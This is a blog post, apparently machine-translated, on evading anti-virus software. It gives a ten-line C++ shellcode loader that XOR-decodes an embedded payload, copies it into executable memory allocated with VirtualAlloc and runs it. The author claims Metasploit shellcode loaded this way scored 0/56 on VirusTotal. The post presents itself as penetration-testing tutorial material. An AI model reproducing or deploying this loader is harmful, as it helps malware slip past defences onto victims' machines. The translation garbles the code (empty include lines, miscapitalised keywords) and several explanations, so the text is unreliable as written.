Use ten lines of code to bypass anti-virus software for kill-free Process Analysis

Use ten lines of code to bypass anti-virus software for kill-free Process Analysis

I originally intended to write a lengthy blog about bypass technologies for different anti-virus software, but when I started writing the first chapter of the tutorial and uploading samples to virustotal, I was shocked! The sample obtained a 0/56 detection rate. So I decided to discard the previous long article and record this fast and incredible simple method.

I believe that most readers will agree with this point of view. The basic methods to bypass most anti-virus software are not special. However, I also occasionally see some people who rely solely on tools to generate binary files that are easily identified by anti-virus software through fingerprints. This article is intended for these people.

Before getting started with this small C ++ code, I would like to introduce a very good tool for making kill-free Veil-Evasion (part of Veil-Framework ). This tool is amazing (thanks @ harmj0y and his friends for creating this amazing project). In almost all cases, it has never disappointed me. If so, I will criticize those who will always generate binary files and upload them to virustotal for testing. If you do not do this, it will be even better.

In any case, this raises a question. Since tools like Veil-Evasion are so magical, why do you need to care about how to add shellcode to a binary file? There are many reasons:

Daniel is very busy and the tools are outdated. The binary generated by the tool has similar fingerprints, not payload, but the binary structure compiled by the tool has similar fingerprints. As a Penetration Tester, you should know how to do it.

Before you look at the following code, you should note that this is for the Windows platform, it is obvious that the Code contains windows. h references.

# Include
  
   
# Include
   
    
Int main (int argc, char ** argv) {char B [] = {/* Insert the shellcode code after your operation is different from that of 'X', for example, 0x4C, 0x4F, 0x4C */}; char c [sizeof B]; for (int I = 0; I <sizeof B; I ++) {c [I] = B [I] ^ 'X';} void * exec = VirtualAlloc (0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy (exec, c, sizeof c); (void (*) () exec )();}
   
  

The code above creates an array of characters that can contain the shellcode on your own. The key point is that your shellcode is different from the lower-case letter 'x' and some memory is allocated, copy the character array to the allocated memory and execute it. Note that you must first perform an exception or operation between shellcode and the keyword you selected ('x' in this example), then put shellcode in the above Code and compile it.

Then you may ask "that's all ?". I understand how you feel, because I thought so at the time. After writing the first chapter and uploading the sample to virustotal, I received a 0/56 detection rate. I would like to emphasize that this is an incredible simple and basic technology, but its success rate is surprisingly high.

 

 

The SHA256 value of your binary file may be different from that of my sample. The shellcode contained in my sample is generated by metasploit framework.